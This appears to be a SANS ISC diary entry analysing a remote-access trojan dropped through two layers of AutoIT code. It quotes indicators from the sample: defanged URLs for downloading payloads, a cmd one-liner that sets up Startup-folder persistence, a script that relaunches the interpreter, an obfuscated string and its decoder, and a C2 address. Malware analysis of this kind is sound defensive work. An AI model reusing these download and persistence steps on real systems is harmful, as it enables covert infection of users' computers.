RAT Dropped By Two Layers of AutoIT Code

    Published: 2025-05-19. Last Updated: 2025-05-19 05:37:10 UTC
    by Xavier Mertens (Version: 1)
    0 comment(s)

    Like .Net, AutoIT[1] remains a popular language for years in the malware ecosystem. It's a simple language that can interact with all the components of the Windows operating system. I regularly discover AutoIT3 binaries (yes, it can be compiled). This weekend, I found a malware delivered through a double layer of AutoIT code!

    The initial file is an executable called "1. Project & Profit.exe" (SHA256:b5fbae9376db12a3fcbc99e83ccad97c87fb9e23370152d1452768a3676f5aeb). This is an AutoIT compiled script. Once decompiled, the code is simple and contains interesting strings:

    Global $VY9A = "hxxps://xcvbsfq32e42313[.]xyz/OLpixJTrO"
Global $ZX2B = "C:\Users\Public\Guard.exe"
Global $FW3N = "C:\Users\Public\PublicProfile.ps1"
$fU5L = ""hxxps://xcvbsfq32e42313[.]xyz/hYlXpuF.txt"""
$oF6L = ""C:\Users\Public\Secure.au3

    It's behaviour is simple: It will generate the PublicProfile.ps1 and execute it.

    An AutoIT interpreter will be downloaded (and saved as "C:\Users\Public\Guard.exe") as well as another piece of AutoIT script (the second layer)

    Persistence is achieved via a simple .url file placed in the Startup directory:

    cmd /k echo [InternetShortcut] > "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit

    The JavaScript script will re-execute the AutoIT interpreter ("SwiftWrite.pif") with its second script ("G"):

    new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\REM\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\REM\\AppData\\Local\\WordGenius Technologies\\G\"")

    Let's have a look at "G", the second layer of AutoIT code. This script is pretty well obfuscated. All strings are encoded using the Wales() function. Example:

    If (Execute(Wales("80]114]111]99]101]115]115]69]120]105]115]116]115]40]39]97]118]97]115]116]117]105]46]101]120]101]39]41",0/2))) ...

    The Wales function is simple, here is a Python version to help to decode all strings:

    remnux@remnux:/MalwareZoo/20250518$ python3
Python 3.8.10 (default, Jun 22 2022, 20:18:18) 
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> def Wales(encoded: str, key: int) -> str:
...     parts = [p for p in encoded.split("]") if p]
...     decoded = ''.join(chr(int(num) - key) for num in parts)
...     return decoded
... 
>>> Wales("80]114]111]99]101]115]115]69]120]105]115]116]115]40]39]97]118]97]115]116]117]105]46]101]120]101]39]41",0)
"ProcessExists('avastui.exe')"

    Finally, a "jsc.exe" process is spanwed and injected with the final malware as a DLL: Urshqbgpm.dll

    I'm not sure about the final malware because it tried to connect to the C2 server 139[.]99[.]188[.]124 on port 56001. This one is associated to AsyncRAT.

    But, in the DLL, we can find a lot of references to PureHVNC[2]:

    [1] https://www.autoitscript.com/site/
    [2] https://cyble.com/blog/pure-coder-offers-multiple-malware-for-sale-in-darkweb-forums/

    Xavier Mertens (@xme)
    Xameco
    Senior ISC Handler - Freelance Cyber Security Consultant
    PGP Key

    Keywords: AutoIT Injection PowerShell RAT Script
    0 comment(s)
    ISC Stormcast For Monday, May 19th, 2025 https://isc.sans.edu/podcastdetail/9456

      Comments

      Login here to join the discussion.


      Diary Archives